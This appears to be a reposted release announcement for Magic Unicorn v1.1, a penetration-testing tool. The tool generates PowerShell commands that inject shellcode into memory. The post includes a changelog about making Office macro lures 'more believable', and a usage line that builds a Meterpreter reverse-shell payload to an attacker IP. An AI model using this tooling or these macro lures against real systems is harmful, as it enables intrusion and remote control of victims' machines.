Updates Unicorn v-1.1 -  a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory.

Updates Unicorn v-1.1 – a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory.

+changelog version 1.1  – 22/04/2015:
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* fixed autoopen from not working on some office implementations – now works on all office documents including powerpoint/word/excel
* changed the open description to fix a typo and also make it more believable
* fixed spacing issues when generating macro attack
* added instructions on when using macro on how to add the macro to an office document
* added better description and instructions for powershell injection
* added better description on initial loading of payloadunicorn

Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber’s powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Usage is simple, just run Magic Unicorn (ensure Metasploit is installed and in the right path) and magic unicorn will automatically generate a powershell command that you need to simply cut and paste the powershell code into a command line window or through a payload delivery system.

w0rm32~root@$ python unicorn.py

Unicorn is a PowerShell injection tool utilizing Matthew Graebers attack and expanded to automatically downgrade the process if a 64 bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.

Usage: python unicorn.py payload reverse_ipaddr port Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443

Download : unicorn-1.1.tar.gz | unicorn-1.1.zip | Clone Url
Source: TrustSec  | https://www.trustedsec.com/ | Our Post Before